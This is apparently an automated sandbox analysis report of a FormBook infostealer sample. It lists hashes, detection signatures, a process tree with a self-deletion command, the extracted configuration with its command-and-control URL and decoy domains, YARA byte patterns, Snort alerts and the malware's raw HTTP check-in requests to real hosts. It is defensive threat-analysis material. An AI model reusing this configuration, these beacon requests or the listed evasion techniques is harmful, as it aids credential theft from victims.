Loading ...

Play interactive tourEdit tour

Analysis Report 0O9BJfVJi6fEMoS.exe

Overview

General Information

Sample Name:0O9BJfVJi6fEMoS.exe
Analysis ID:356555
MD5:18ec78e09155c046a203fb4dcbc3593f
SHA1:40e67eef7c001a8752763616fc9a58170721c27a
SHA256:01c5ac824171a164473d92187f8031f2bc7103397fe534f56771d8e9589445e0
Tags:exeFormbookYahoo

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 0O9BJfVJi6fEMoS.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe' MD5: 18EC78E09155C046A203FB4DCBC3593F)
    • 0O9BJfVJi6fEMoS.exe (PID: 3492 cmdline: {path} MD5: 18EC78E09155C046A203FB4DCBC3593F)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6664 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • explorer.exe (PID: 6700 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6812 cmdline: /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.besteprobioticakopen.online/uszn/"], "decoy": ["animegriptape.com", "pcpnetworks.com", "putupmybabyforadoption.com", "xn--jvrr98g37n88d.com", "fertinvitro.doctor", "undonethread.com", "avoleague.com", "sissysundays.com", "guilhermeoliveiro.site", "catholicon-bespeckle.info", "mardesuenosfundacion.com", "songkhoe24.site", "shoecityindia.com", "smallbathroomdecor.info", "tskusa.com", "prairiespringsllc.com", "kegncoffee.com", "clicklounge.xyz", "catholicendoflifeplanning.com", "steelobzee.com", "xiknekiterapia.com", "whereinthezooareyou.com", "maglex.info", "dango3.net", "sqjqw4.com", "theparadisogroup.com", "karthikeyainfraindia.com", "luewevedre.com", "helpwithmynutrition.com", "lengyue.cool", "pbipropertiesllc.com", "glidedisc.com", "sz-rhwjkj.com", "776fx.com", "kamanantzin.com", "grandwhale.com", "trump2020shop.net", "gentilelibri.com", "jarliciouslounge.com", "dgcsales.net", "hypno.doctor", "holidayinnindyairportnorth.com", "buysellleasewithlisa.com", "girishastore.com", "tinynucleargenerators.com", "crystalphoenixltd.com", "lapplify.com", "bailbondinazusa.com", "michaelmery.com", "tripleecoaching.com", "fastenerspelosato.net", "horisan-touki.com", "marketingavacado.com", "centrebiozeina.com", "xn--3etz63bc5ck9c.com", "rhemachurch4u.com", "homeschoolangel.com", "romeysworld.com", "themixedveggies.com", "queendreea.club", "epedalflorida.com", "blutreemg.com", "nongfupingtai.com", "shikshs.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xaee68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xaf1f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd6288:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd6612:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xbaf05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xe2325:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xba9f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xe1e11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xbb007:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xe2427:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xbb17f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xe259f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xafc0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xd702a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xb9c6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xe108c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb0982:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xd7da2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xbfff7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xe7417:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xc109a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.besteprobioticakopen.online/uszn/Avira URL Cloud: Label: malware
          Source: http://www.besteprobioticakopen.online/uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoXAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.besteprobioticakopen.online/uszn/"], "decoy": ["animegriptape.com", "pcpnetworks.com", "putupmybabyforadoption.com", "xn--jvrr98g37n88d.com", "fertinvitro.doctor", "undonethread.com", "avoleague.com", "sissysundays.com", "guilhermeoliveiro.site", "catholicon-bespeckle.info", "mardesuenosfundacion.com", "songkhoe24.site", "shoecityindia.com", "smallbathroomdecor.info", "tskusa.com", "prairiespringsllc.com", "kegncoffee.com", "clicklounge.xyz", "catholicendoflifeplanning.com", "steelobzee.com", "xiknekiterapia.com", "whereinthezooareyou.com", "maglex.info", "dango3.net", "sqjqw4.com", "theparadisogroup.com", "karthikeyainfraindia.com", "luewevedre.com", "helpwithmynutrition.com", "lengyue.cool", "pbipropertiesllc.com", "glidedisc.com", "sz-rhwjkj.com", "776fx.com", "kamanantzin.com", "grandwhale.com", "trump2020shop.net", "gentilelibri.com", "jarliciouslounge.com", "dgcsales.net", "hypno.doctor", "holidayinnindyairportnorth.com", "buysellleasewithlisa.com", "girishastore.com", "tinynucleargenerators.com", "crystalphoenixltd.com", "lapplify.com", "bailbondinazusa.com", "michaelmery.com", "tripleecoaching.com", "fastenerspelosato.net", "horisan-touki.com", "marketingavacado.com", "centrebiozeina.com", "xn--3etz63bc5ck9c.com", "rhemachurch4u.com", "homeschoolangel.com", "romeysworld.com", "themixedveggies.com", "queendreea.club", "epedalflorida.com", "blutreemg.com", "nongfupingtai.com", "shikshs.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 0O9BJfVJi6fEMoS.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: explorer.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 0O9BJfVJi6fEMoS.exe, explorer.exe
          Source: Binary string: explorer.pdb source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.besteprobioticakopen.online/uszn/
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1Host: www.fastenerspelosato.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1Host: www.sissysundays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1Host: www.whereinthezooareyou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1Host: www.fertinvitro.doctorConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1Host: www.dgcsales.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1Host: www.horisan-touki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1Host: www.karthikeyainfraindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1Host: www.buysellleasewithlisa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1Host: www.besteprobioticakopen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.246.6.109 35.246.6.109
          Source: Joe Sandbox ViewASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN NETMAGIC-APNetmagicDatacenterMumbaiIN
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1Host: www.fastenerspelosato.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1Host: www.sissysundays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1Host: www.whereinthezooareyou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1Host: www.fertinvitro.doctorConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1Host: www.dgcsales.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1Host: www.horisan-touki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1Host: www.karthikeyainfraindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1Host: www.buysellleasewithlisa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1Host: www.besteprobioticakopen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fastenerspelosato.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Tue, 23 Feb 2021 09:08:03 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://code.google.com/feeds/p/topicalmemorysystem/downloads/basic.xml
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://code.google.com/p/topicalmemorysystem/
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://topicalmemorysystem.googlecode.com/files/
          Source: explorer.exe, 00000007.00000002.913073739.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.biblegateway.com/passage/?search=
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.biblija.net/biblija.cgi?m=
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.blueletterbible.org/Bible.cfm?b=
